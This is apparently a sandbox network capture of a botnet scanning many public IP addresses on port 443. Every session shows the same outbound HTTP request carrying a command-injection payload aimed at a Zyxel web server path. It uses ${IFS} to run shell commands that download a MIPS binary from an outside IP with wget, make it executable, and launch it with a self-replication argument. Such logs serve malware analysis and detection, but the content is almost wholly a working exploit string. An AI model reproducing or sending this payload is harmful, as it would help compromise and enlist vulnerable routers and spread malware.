                                                  Jan 19, 2024 18:24:12.374284029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8342192.168.2.1335126117.192.237.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374310017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8343192.168.2.135984863.190.242.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374357939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8344192.168.2.1356390103.196.186.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374393940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8345192.168.2.1353936219.228.251.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374454975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8346192.168.2.1343732177.94.10.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374501944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8347192.168.2.1357744126.98.178.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374536037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8348192.168.2.1354422124.135.199.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374567986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8349192.168.2.133708492.199.129.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374607086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8350192.168.2.1342416192.64.220.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374665976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8351192.168.2.1353300192.98.8.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374700069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8352192.168.2.1339064174.175.111.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374752998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8353192.168.2.134651880.106.97.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374795914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8354192.168.2.135947220.227.170.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374834061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8355192.168.2.1357982122.93.41.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374880075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8356192.168.2.1347828130.1.109.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374941111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8357192.168.2.134561286.43.182.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374979019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8358192.168.2.1354136186.68.174.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375011921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8359192.168.2.133760876.32.23.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375061035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8360192.168.2.1349040222.148.42.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375113964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8361192.168.2.135453431.71.180.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375145912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8362192.168.2.1342094183.121.73.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375206947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8363192.168.2.1338472171.135.136.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375240088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8364192.168.2.1334964178.97.189.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375266075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8365192.168.2.1342962217.97.191.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375288963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8366192.168.2.1346384101.199.212.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375339031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8367192.168.2.1340846117.95.107.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375356913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8368192.168.2.134602424.87.248.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375417948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8369192.168.2.1337434180.3.54.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375453949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8370192.168.2.133405495.106.101.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375489950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8371192.168.2.1349488165.87.254.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375543118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8372192.168.2.13539048.166.12.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375574112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8373192.168.2.133943067.41.167.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375612974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8374192.168.2.134986661.233.187.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375658989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8375192.168.2.1351820114.38.146.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375683069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8376192.168.2.1344182191.67.58.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375739098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8377192.168.2.1340896150.244.117.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375783920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8378192.168.2.1347462194.214.23.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375825882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8379192.168.2.1346710209.75.161.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375857115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8380192.168.2.134334451.53.43.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375890970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8381192.168.2.13499189.166.56.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375955105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8382192.168.2.1360392180.70.107.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.375993967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8383192.168.2.1353066146.141.91.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376046896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8384192.168.2.1352522213.205.228.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376094103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8385192.168.2.1352404198.200.217.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376176119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8386192.168.2.135187467.150.221.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376173973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8387192.168.2.1342876210.67.155.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376190901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8388192.168.2.1337054175.122.226.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376252890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8389192.168.2.135211863.240.98.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376293898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8390192.168.2.1338266146.143.120.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376327038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8391192.168.2.1353536121.87.71.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376342058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8392192.168.2.1360048191.50.29.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376388073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8393192.168.2.1344630119.72.230.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376426935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8394192.168.2.133866882.189.75.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376472950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8395192.168.2.1357682107.228.177.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376513958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8396192.168.2.1348126197.141.217.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376564980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8397192.168.2.1356544121.172.49.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376570940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8398192.168.2.133448444.148.173.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376610994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8399192.168.2.1346060176.10.217.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376643896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8400192.168.2.1352384142.224.198.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376681089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8401192.168.2.1337658136.108.115.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376703978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8402192.168.2.1339416161.250.23.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376740932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8403192.168.2.1342866184.212.67.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376791000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8404192.168.2.1334380205.193.25.142443
                                                  TimestampBytes transferredDirectionData
